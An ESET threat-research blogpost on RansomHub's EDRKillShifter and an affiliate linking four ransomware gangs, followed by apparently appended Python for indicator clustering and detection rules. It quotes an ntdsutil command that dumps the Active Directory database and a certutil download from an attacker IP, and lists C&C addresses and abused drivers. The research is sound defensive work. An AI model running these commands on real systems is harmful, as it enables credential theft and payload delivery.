Shifting the sands of RansomHub's EDRKillShifter

Award-winning news, views and insight from the ESET security community
ESET Research

ESET researchers discover new ties between affiliates of RansomHub and of rival gangs Medusa, BianLian and Play

Jakub Souček, Jan Holman
26 Mar 2025

25 min read
ESET researchers take a look back at the significant changes in the ransomware ecosystem in 2024 and focus on the newly emerged and currently dominating ransomware-as-a-service (RaaS) gang RansomHub. We share previously unpublished insights into RansomHub's affiliate structure and uncover clear connections between this newly emerged giant and the well-established gangs Play, Medusa and BianLian.

We also emphasize the emerging threat of EDR killers, unmasking EDRKillShifter, a custom EDR killer developed and maintained by RansomHub. We have observed an increase in ransomware affiliates using code derived from publicly available proofs of concept, while the set of drivers being abused is largely fixed.

Finally, based on our observations following the law-enforcement-led Operation Cronos and the demise of the infamous BlackCat gang, we offer our insights into how to assist in this intensive fight against ransomware.

The fight against ransomware reached two milestones in 2024: LockBit and BlackCat, formerly the top two gangs, dropped out of the picture. And for the first time since 2022, recorded ransomware payments dropped, by a stunning 35%, despite expectations to the contrary in the middle of the year. On the other hand, the recorded number of victims posted on dedicated leak sites (DLSs) increased by roughly 15%.

A big part of this increase is due to RansomHub, a new RaaS gang that emerged around the time of Operation Cronos. In this blogpost, we look in depth at RansomHub and demonstrate how we leveraged to our advantage the way affiliates use RansomHub's tooling, allowing us to draw connections between RansomHub and its rivals, including well-established ones like Play, Medusa and BianLian.

Throughout this blogpost, we refer to the entities forming the ransomware-as-a-service model as follows:

RansomHub announced its first victim on its DLS (see Figure 1) on February 10th, 2024, 10 days before the public announcement of Operation Cronos. While the gang's rise was slow, it was also consistent, and when in April
2024 RansomHub achieved the most victim postings of all active ransomware groups (disregarding LockBit posting fakes), it was clear that this was a gang to keep a close eye on. Since then, RansomHub has dominated the ransomware scene.

To further demonstrate how dangerous RansomHub is, let's compare it to LockBit. Figure 2 shows the daily cumulative sum (on the y-axis) of new victims posted on the DLS of LockBit vs. RansomHub, starting from RansomHub's appearance in February 2024.

As you can clearly see, while RansomHub started announcing victims more slowly, nearly nine months later the gang had accumulated more victims since its start than LockBit, and that trend continues to this day. Considering that both BlackCat and LockBit suffered huge blows right around the time RansomHub emerged, we can confidently assume that many skilled affiliates migrated to RansomHub. Notchy, the BlackCat affiliate who stole more than 4 TB of data from Change Healthcare, is just one publicly known example.

Figure 3 shows the ransom note that RansomHub affiliates leave on their victims' machines.

Figure 3. RansomHub ransom note

Just as any emerging RaaS gang, RansomHub needed to attract affiliates, and since there is strength in numbers, the operators weren't very picky. The initial advertisement was posted on the Russian-speaking RAMP forum on February 2nd, 2024, eight days before the first victims were posted. There are a few things to note about the initial announcement:

Guarantees like receiving the ransom payment directly to the affiliate's wallet and keeping a generous 90% certainly sound promising, especially in the chaos following the BlackCat and LockBit disruptions. Additionally, the entry barrier is very low, allowing even low-skilled affiliates to try their luck.

It is also worth mentioning that RansomHub's encryptor is not written from scratch but is based on repurposed code from Knight, a once-rival ransomware gang that sold its source code in February 2024. The affiliates request the encryptor (often called a
locker by RaaS operators) through the web panel offered by RansomHub. As is typical for RaaS gangs, the component responsible for generating the encryptor is referred to as a builder. Because information such as the unique victim ID is hardcoded in the encryptor, an affiliate needs to request a new one for every victim. RansomHub's builder adds an additional layer of protection to its encryptors: a 64-character password without which the encryptor does not work. This password is unique for each sample generated by the builder and known only to the affiliate who requested the encryptor.

On June 21st, 2024, RansomHub operators changed the affiliate rules in reaction to an alleged breach by security researchers. In response, the operator no longer accepted vouching by existing members as sufficient and strictly required a US$5,000 deposit from aspiring affiliates. This was the last noteworthy message from the RansomHub operators. However, between the initial announcement and this rule change, one more important event happened, which we dive into in the next section.

On May 8th, 2024, the RansomHub operators made a significant update: they introduced their own EDR killer, a special type of malware designed to terminate, blind, or crash the security product installed on a victim's system, typically by abusing a vulnerable driver.

RansomHub's EDR killer, named EDRKillShifter by Sophos, is a custom tool developed and maintained by the operator. EDRKillShifter is offered to RansomHub affiliates through the web panel, same as the encryptor, and it too is protected by a 64-character password. Functionality-wise, it is a typical EDR killer, targeting a large variety of security solutions that the RansomHub operators expect to find protecting the networks they aim to breach. A notable distinction lies in the code protection: the password protects shellcode that acts as a middle layer of the killer's execution. Without the password, security researchers can retrieve neither the list of targeted process names nor the
abused vulnerable driver.

Sophos probably chose "shifter" for the name to reflect the fact that the abused driver is not always the same: at least two different vulnerable drivers, both abused by other known EDR killers too, were observed. We dive more in depth into EDRKillShifter and other EDR killers in the EDR killers on the rise section.

The decision to implement a killer and offer it to affiliates as part of the RaaS program is rare. Affiliates are typically on their own to find ways to evade security products: some reuse existing tools, while more technically oriented ones modify existing proofs of concept or use EDR killers available as a service on the dark web. Evidently, ransomware affiliates thought this was a good idea, because soon after the announcement ESET researchers saw a steep increase in the use of EDRKillShifter, and not exclusively in RansomHub cases, as we demonstrate in the next section.

Roughly a month after EDRKillShifter's announcement, on June 3rd, 2024, RansomHub operators posted yet another update, stating that they had improved EDRKillShifter. ESET telemetry shows that some affiliates deployed this updated version only four days later.

ESET researchers took advantage of the wide popularity that EDRKillShifter gained upon its launch to expand our research. We were able to leverage its usage to associate RansomHub affiliates with the multiple rival gangs that they also work for, as well as to retrieve clearer internal versioning of this EDR killer.

The difference between RansomHub's encryptor and EDRKillShifter is that there is no reason for affiliates to build a new sample of EDRKillShifter for every intrusion unless there is a major update. This is exactly what allowed us to uncover one of RansomHub's affiliates working for three rival gangs: Play, Medusa and BianLian.

These three gangs differ significantly:

Discovering a link between RansomHub and Medusa is not that surprising, as it is common knowledge that ransomware affiliates often work for multiple operators
simultaneously. However, we did not expect well-established gangs operating under the closed RaaS model (meaning that they do not actively look for new recruits and their partnerships are based on long-term mutual trust) to form alliances with RansomHub so quickly. Other well-established gangs besides BianLian and Play also operate under the closed RaaS model; the recent BlackBasta leak offered unique insight into the inner workings of such groups.

One way to explain Play and BianLian having access to EDRKillShifter is that they hired the same RansomHub affiliate, which is unlikely given the closed nature of both gangs. Another, more plausible explanation is that trusted members of Play and BianLian are collaborating with rivals, even newly emerged ones like RansomHub, and then repurposing the tooling they receive from those rivals in their own attacks. This is especially interesting since such closed gangs typically employ a rather consistent set of core tools during their intrusions. Before diving into the specifics of the discovered overlaps, let's briefly introduce the modus operandi of the Play gang.

The Play gang posted its first victims to its DLS on November 26th, 2022, and has shown steady growth since then. In April 2024, Play made it to the top three most active ransomware gangs on the scene and consistently remained in the top 10 for the whole year. The gang posts 25 new victims each month on average, focusing on SMBs, hinting that the gang has at least several experienced, loyal affiliates. Recently, Play has been linked to the North Korea-aligned group Andariel.

As expected from a closed RaaS gang, most cases involving the Play encryptor show similarities. Typically, in such intrusions:

The remainder of the attack typically employs a wide arsenal of tools as well as living-off-the-land techniques.

Let's look in depth at the links we discovered. We emphasize first the most important ones in Figure 4 and then dive into the details of each of the intrusions. We believe with high
confidence that all these attacks were performed by the same threat actor working as an affiliate of the four ransomware gangs shown in Figure 4. We are not tracking this threat actor under a dedicated name at this point, but for convenience we'll refer to this threat actor as QuadSwitcher.

As you can see in Figure 4, there are a total of five intrusions from four different ransomware gangs, interlinked by:

The following sections go into the individual intrusions in more detail.

In July 2024, QuadSwitcher deployed the RansomHub encryptor along with EDRKillShifter (SHA-1: BF84712C5314DF2AA851B8D4356EA51A9AD50257) at a manufacturing company in Western Europe and an automotive company in Central Europe.

In August, QuadSwitcher compromised a governmental institution in North America using PuTTY and, shortly after, Rclone. They proceeded by installing AnyDesk and protecting it with a password via a PowerShell script (anydes.ps1, part of the Conti leaks). Attempting to evade the security solution, the threat actor deployed EDRKillShifter (SHA-1: BF84712C5314DF2AA851B8D4356EA51A9AD50257) and TDSSKiller.

At the end of July 2024, QuadSwitcher compromised a company in the legal sector in North America. During that intrusion, the threat actor dumped the Active Directory database by executing:

powershell ntdsutil.exe "ac i ntds" "ifm" "create full c:\temp1" q q

deployed AnyDesk via the same installation script from the Conti leaks, and used Advanced IP Scanner to scan the network. Six days later, the attacker installed the ScreenConnect and Ammyy Admin remote monitoring and management (RMM) tools and deployed EDRKillShifter (SHA-1: BF84712C5314DF2AA851B8D4356EA51A9AD50257). After almost a month of no activity, the attacker returned and downloaded two payloads from http://45.32.206.169/.

Additionally, QuadSwitcher deployed SystemBC, using 45.32.210.151 as its C&C server, and a signature BianLian backdoor with C&C server 92.243.64.200:6991, downloaded from http://149.154.158.222:33031/ (the file name survives in the extracted text only as win641exe). The victim was later announced on BianLian's DLS.

In early August 2024,
QuadSwitcher compromised a manufacturing company in North America. They deployed SystemBC (C&C 45.32.210.151), EDRKillShifter (SHA-1: 77DAF77D9D2A08CC22981C004689B870F74544B5), and WKTools, downloaded from http://45.32.206.169/WKTools.exe. Ultimately, the threat actor deployed the Play encryptor.

At the end of August 2024, QuadSwitcher compromised a technology company in Western Europe, downloading PuTTY from http://130.185.75.198:8000/plink.exe using certutil.exe, followed by using Process Explorer and EDRKillShifter (SHA-1: BF84712C5314DF2AA851B8D4356EA51A9AD50257). The threat actor also downloaded MeshAgent from http://79.124.58.130/ (the file name survives in the extracted text only as dlgitexe), again via certutil.exe. The victim was later announced on Medusa's DLS.

Besides the links summarized in Figure 4, there are TTPs that most resemble typical Play intrusions. In three of the cases, additional malware and tools were downloaded from the root folder of a server accessed via an IP address over HTTP, and QuadSwitcher also used SystemBC, commodity malware heavily used by the Play gang. These links lead us to believe QuadSwitcher is most closely related to Play.

Additionally, QuadSwitcher has access to at least two EDRKillShifter samples compiled two months apart, signaling that the threat actor had extended access to RansomHub's tooling.

In September 2024, ESET researchers documented a case where CosmicBeetle, an immature ransomware threat actor using its own signature encryptor ScRansom and the leaked LockBit 3.0 builder, became an affiliate of RansomHub. Note that CosmicBeetle is not a gang but an individual distributing and developing various ransomware. Following the publication of our findings, we observed CosmicBeetle further utilize EDRKillShifter during:

Other immature ransomware affiliates were spotted using EDRKillShifter before deploying their custom encryptors, often created simply by using the leaked LockBit 3.0 builder as well. This shows one weakness of RansomHub: in its greed to grow as quickly as possible, it wasn't very picky about its affiliates. As a result, it was, by its
own admission, breached by security researchers in June 2024. Additionally, immature affiliates tend to leave significantly more trails, which enabled us to learn more about both them and RansomHub.

In the blogpost about CosmicBeetle, we mentioned EDRKillShifter being deployed from an unusual path: C:\Users\Administrator\Music\108.zip. In the following months, multiple other immature affiliates left similar trails that enabled us to partially reconstruct EDRKillShifter's versioning, shown in Table 1. The VERSIONINFO column refers to EDRKillShifter's version as listed in its VERSIONINFO resource, while the Deployment path column refers to the version mentioned in the path discovered by ESET telemetry.

Table 1. EDRKillShifter versioning

After July 2024, there was only a single, very generic update from the RansomHub operator posted on RAMP, which correlates with our not seeing new versions of EDRKillShifter in the wild. Reconstructing the development timeline of EDRKillShifter also allowed us to spot these development practices:

EDRKillShifter quickly gained popularity among ransomware affiliates and, as we just demonstrated, they don't use it exclusively in RansomHub intrusions. However, it is not the only EDR killer out there; in fact, ESET researchers have observed an increase in the variety of EDR killers used by ransomware affiliates.

An EDR killer is malware designed to run in a compromised network to blind, corrupt, crash, or terminate the security solutions protecting the endpoints. The obvious goal is to allow smooth execution of the ransomware encryptor. While more immature ransomware affiliates settle for scripts that simply try to terminate a list of processes, more sophisticated ones go beyond that and use the technique known as Bring Your Own Vulnerable Driver (BYOVD).

EDR killers are an effective and increasingly popular addition to ransomware affiliates' arsenals. During an intrusion, the goal of the affiliate is to obtain admin or domain admin privileges. Ransomware operators tend not to do
major updates of their encryptors too often, due to the risk of introducing a flaw that could cause issues, ultimately damaging their reputation. As a result, security vendors detect the encryptors quite well, which the affiliates react to by using EDR killers to get rid of the security solution just before executing the encryptor.

Advanced EDR killers consist of two parts: a user mode component responsible for orchestration, which we will refer to as the killer code, and a legitimate but vulnerable driver. The execution is typically very straightforward: the killer code installs the vulnerable driver (typically embedded in its data or resources), iterates over a list of process names, and issues a command to the vulnerable driver for each of them, triggering the vulnerability and killing the process from kernel mode.

Sophos documented in their blogpost how different builds of EDRKillShifter abuse different vulnerable drivers. One of the abused drivers, rentdrv2.sys, is also part of BadRentdrv2, a publicly available EDR killer. The second one, TFSysMon from ThreatFire System Monitor, is also part of TFSysMonKiller, another publicly available PoC. The latter belongs to a bigger collection of four EDR killer PoCs written in Rust, which we have observed threat actors reimplement in C without changing a single line of code.

While the Living Off The Land Drivers project lists over 1,700 vulnerable drivers, making them a lucrative target for cybercriminals, only a handful of these drivers are abused by EDR killers: if there is tested code abusing a vulnerability in one of these drivers, it is much easier to reuse it than to design the code from scratch. Additionally, it allows the EDR killer developers to focus on the killer code and its stealthiness.

Legitimate tools are abused by ransomware affiliates to work as EDR killers too. Such tools, like the GMER rootkit detector and PC Hunter, by their nature require access to kernel mode and need to closely inspect the internals of the operating
system. Unfortunately, they also offer powerful functionality that can be abused in the hands of malicious threat actors.

RaaS programs often don't provide affiliates only with encryptors; additional tools and playbooks may be part of the package. For instance, LockBit offered Stealbit, a custom data exfiltration tool, to its affiliates, and the Conti leaks and the Dispossessor leak disclosed that playbooks, scripts and know-how are also part of the ransomware gangs' arsenal.

Adding an EDR killer to a RaaS offering seems logical, and RansomHub is not the only gang doing that. In October 2024, ESET researchers documented that the emerging ransomware gang Embargo implemented its own EDR killer as well, called MS4Killer, by modifying a publicly available PoC. At the time of writing, while the group listed only 14 victims on its DLS, it had already invested time and resources into developing its own EDR killer.

It remains to be seen whether EDR killers find their place in more gangs' offerings. However, this blogpost has also demonstrated that researchers may leverage their usage to cluster affiliates and discover new relationships between rival gangs.

Defending against EDR killers is challenging. Threat actors need admin privileges to deploy an EDR killer, so ideally their presence should be detected and mitigated before they reach that point.

While preventing the killer code from executing is the best approach, code obfuscation can make this unreliable. However, focusing on the vulnerable drivers provides additional defense options. ESET considers drivers exploited by EDR killers potentially unsafe. Therefore, users, especially in corporate environments, should ensure that the detection of potentially unsafe applications is enabled. This can prevent the installation of vulnerable drivers.

Although not common, sophisticated threat actors may exploit a vulnerable driver already present on a compromised machine instead of relying on BYOVD. To counter this, having proper patch management in place is an
effective and essential defense strategy.

The ransomware ecosystem suffered significant blows in 2024. Although the overall number of recorded attacks increased, that should not overshadow the positive effect of successfully disrupting or eliminating two ransomware gangs that had been dominating the scene for years.

We can speculate about how much the result of law enforcement actions decreased ransomware payments, or how growing awareness and initiatives like the Counter Ransomware Initiative are helping ransomware victims understand that paying the ransom may not be the best way forward.

What is clear, unfortunately, is that a new, sophisticated ransomware group, RansomHub, emerged, used the right tactics to attract affiliates (many of whom we believe transitioned from BlackCat and LockBit in a short period), and was quickly able to climb to the top of the ladder. In the foreseeable future, RansomHub will surely try to remain among the most active RaaS gangs.

Law-enforcement-led disruptions of RaaS operators have proved effective, sowing distrust in the RaaS ecosystem. Unfortunately, 2024 showed that affiliates are able to regroup fairly quickly. After all, they have strong financial incentives to deploy encryptors to, and exfiltrate sensitive data from, their targets. Although more difficult to accomplish than disruptions, eliminating the most active affiliates from the picture is also effective, because it can prevent new RaaS operators from gaining strength as quickly as RansomHub did. We believe that focusing on the affiliates, especially by tracking down their links between various gangs, as demonstrated in this blogpost between RansomHub, Play, Medusa and BianLian, will ultimately lead to the identification of the affiliates and their removal from the game.

A comprehensive list of indicators of compromise and samples can be found in our GitHub repository.

This table was built using version 16 of the MITRE ATT&CK framework.
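The pivoting used in the QuadSwitcher section (joining intrusions that share an EDRKillShifter sample, a SystemBC C&C or a staging server, regardless of which brand's encryptor was ultimately deployed) can be reproduced mechanically. The following Python is an added example written for this page, not ESET's tooling. The intrusion records are constructed from the indicators listed in the QuadSwitcher section, the field names are assumptions, and the sixth record is a hypothetical unrelated case included as a control; the ransomware brand is deliberately not used as a link, since the point is to connect different brands.

```python
"""Cluster intrusions by shared artifacts (added example, not ESET code)."""
from collections import defaultdict
from itertools import combinations

# Constructed from the blogpost's intrusion summaries. Each record names the
# brand announced on the DLS and the reusable artifacts observed in the case.
INTRUSIONS = [
    {"id": "2024-07 RansomHub / manufacturing, W. Europe",
     "gang": "RansomHub",
     "edrkillshifter_sha1": ["BF84712C5314DF2AA851B8D4356EA51A9AD50257"]},
    {"id": "2024-08 RansomHub / government, N. America",
     "gang": "RansomHub",
     "edrkillshifter_sha1": ["BF84712C5314DF2AA851B8D4356EA51A9AD50257"]},
    {"id": "2024-07 BianLian / legal, N. America",
     "gang": "BianLian",
     "edrkillshifter_sha1": ["BF84712C5314DF2AA851B8D4356EA51A9AD50257"],
     "systembc_c2": ["45.32.210.151"],
     "download_host": ["45.32.206.169"]},
    {"id": "2024-08 Play / manufacturing, N. America",
     "gang": "Play",
     "edrkillshifter_sha1": ["77DAF77D9D2A08CC22981C004689B870F74544B5"],
     "systembc_c2": ["45.32.210.151"],
     "download_host": ["45.32.206.169"]},
    {"id": "2024-08 Medusa / technology, W. Europe",
     "gang": "Medusa",
     "edrkillshifter_sha1": ["BF84712C5314DF2AA851B8D4356EA51A9AD50257"],
     "download_host": ["130.185.75.198", "79.124.58.130"]},
    # Hypothetical control case: shares nothing with the records above.
    {"id": "2024-09 unrelated / hypothetical",
     "gang": "RansomHub",
     "edrkillshifter_sha1": ["0000000000000000000000000000000000000000"],
     "download_host": ["192.0.2.10"]},
]

# Artifact types that count as links between intrusions. The brand itself is
# deliberately excluded: the goal is to connect intrusions across brands.
LINK_FIELDS = ("edrkillshifter_sha1", "systembc_c2", "download_host")


def build_links(intrusions, fields=LINK_FIELDS):
    """Map each (field, value) artifact to the ids of intrusions using it,
    keeping only artifacts that actually connect two or more intrusions."""
    index = defaultdict(set)
    for rec in intrusions:
        for field in fields:
            for value in rec.get(field, []):
                index[(field, value.upper())].add(rec["id"])
    return {k: v for k, v in index.items() if len(v) > 1}


def cluster_intrusions(intrusions, fields=LINK_FIELDS):
    """Union-find over intrusions: two intrusions are joined whenever they
    share an artifact. Returns clusters (sets of ids), largest first."""
    parent = {rec["id"]: rec["id"] for rec in intrusions}

    def find(x):
        while parent[x] != x:
            parent[x] = parent[parent[x]]  # path halving
            x = parent[x]
        return x

    for ids in build_links(intrusions, fields).values():
        for a, b in combinations(sorted(ids), 2):
            parent[find(a)] = find(b)

    groups = defaultdict(set)
    for rec in intrusions:
        groups[find(rec["id"])].add(rec["id"])
    return sorted(groups.values(), key=len, reverse=True)


def gangs_in_cluster(intrusions, cluster):
    """Distinct ransomware brands seen inside one cluster."""
    return sorted({r["gang"] for r in intrusions if r["id"] in cluster})


if __name__ == "__main__":
    for cluster in cluster_intrusions(INTRUSIONS):
        print(len(cluster), "intrusion(s):", gangs_in_cluster(INTRUSIONS, cluster))
    for (field, value), ids in sorted(build_links(INTRUSIONS).items()):
        print(f"{field}={value} links {len(ids)} intrusions")
```

Run as written, the five QuadSwitcher cases collapse into one cluster spanning RansomHub, BianLian, Play and Medusa, while the control case stays alone. Note that the Play intrusion is pulled in only through the SystemBC C&C and the staging host, since its EDRKillShifter sample (77DAF77D…) appears nowhere else; this is why pivoting on several artifact types at once matters.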
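To make the defensive advice concrete, here is an added example (not from the blogpost and not an ESET product rule) of three hunting rules in Python for behaviours the intrusions above exhibit: the loading of a driver the post names as abused by EDRKillShifter builds, the ntdsutil IFM export of the Active Directory database, and certutil.exe fetching a file from a bare-IP HTTP server. The events are constructed Sysmon-style records (Event ID 1 for process creation, Event ID 6 for driver load); the driver-name list and the user-writable-path heuristic are illustrative assumptions, not a complete blocklist.

```python
"""Hunting rules for EDR-killer-adjacent behaviour (added example)."""
import re

# Illustrative only: driver file names the post ties to EDRKillShifter builds.
# A real rule would match on the LOLDrivers hash list rather than on names.
VULNERABLE_DRIVER_NAMES = {"rentdrv2.sys", "tfsysmon.sys"}

# Assumed heuristic, not from the post: a driver loaded from a user-writable
# directory is suspicious in itself, since BYOVD drops the driver to disk first.
USER_WRITABLE_RE = re.compile(r"^[a-z]:\\(users|programdata|windows\\temp)\\", re.I)
# ntdsutil ... "ifm" "create full <dir>": offline NTDS.dit export.
NTDS_IFM_RE = re.compile(r"\bntdsutil(\.exe)?\b.*\bifm\b.*\bcreate\s+full\b", re.I)
# http(s)://<dotted quad>[:port]/ with no hostname at all.
IP_URL_RE = re.compile(r"\bhttps?://\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?/", re.I)


def rule_vulnerable_driver(ev):
    """Event ID 6 (DriverLoad): known-abused driver name or user-writable path."""
    if ev.get("EventID") != 6:
        return None
    path = ev.get("ImageLoaded", "")
    name = path.rsplit("\\", 1)[-1].lower()
    if name in VULNERABLE_DRIVER_NAMES:
        return f"known EDR-killer driver loaded: {name}"
    if USER_WRITABLE_RE.match(path):
        return f"driver loaded from user-writable path: {path}"
    return None


def rule_ntds_ifm_dump(ev):
    """Event ID 1 (ProcessCreate): ntdsutil IFM export of the AD database."""
    if ev.get("EventID") != 1:
        return None
    if NTDS_IFM_RE.search(ev.get("CommandLine", "")):
        return "ntdsutil IFM dump of Active Directory"
    return None


def rule_certutil_ip_download(ev):
    """Event ID 1 (ProcessCreate): certutil.exe fetching from a bare-IP URL."""
    if ev.get("EventID") != 1:
        return None
    image = ev.get("Image", "").rsplit("\\", 1)[-1].lower()
    match = IP_URL_RE.search(ev.get("CommandLine", ""))
    if image == "certutil.exe" and match:
        return f"certutil download from IP-addressed server: {match.group(0)}"
    return None


RULES = (rule_vulnerable_driver, rule_ntds_ifm_dump, rule_certutil_ip_download)


def detect(events):
    """Return (event index, finding) pairs for every rule that fires."""
    findings = []
    for i, ev in enumerate(events):
        for rule in RULES:
            hit = rule(ev)
            if hit:
                findings.append((i, hit))
    return findings


# Constructed sample events, not real telemetry. Events 0 and 1 reproduce
# command lines from the QuadSwitcher cases; event 2 is an assumed BYOVD drop.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell ntdsutil.exe "ac i ntds" "ifm" "create full c:\temp1" q q'},
    {"EventID": 1, "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://130.185.75.198:8000/plink.exe plink.exe"},
    {"EventID": 6, "ImageLoaded": r"C:\Windows\Temp\rentdrv2.sys", "Signed": "true"},
    {"EventID": 1, "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -verify C:\certs\server.cer"},
    {"EventID": 6, "ImageLoaded": r"C:\Windows\System32\drivers\tcpip.sys", "Signed": "true"},
    {"EventID": 1, "Image": r"C:\Windows\System32\ntdsutil.exe",
     "CommandLine": r'ntdsutil "activate instance ntds" "list instances" q'},
]

if __name__ == "__main__":
    for idx, finding in detect(SAMPLE_EVENTS):
        print(f"event {idx}: {finding}")
```

Only the first three sample events fire; the benign certutil -verify, the stock tcpip.sys load and the ntdsutil invocation without "ifm" stay quiet. The driver rule is the one that maps onto the "potentially unsafe application" guidance above: whether the match comes from a name list, a hash list or a path heuristic, the point is to catch the driver before the killer code issues its first command to it.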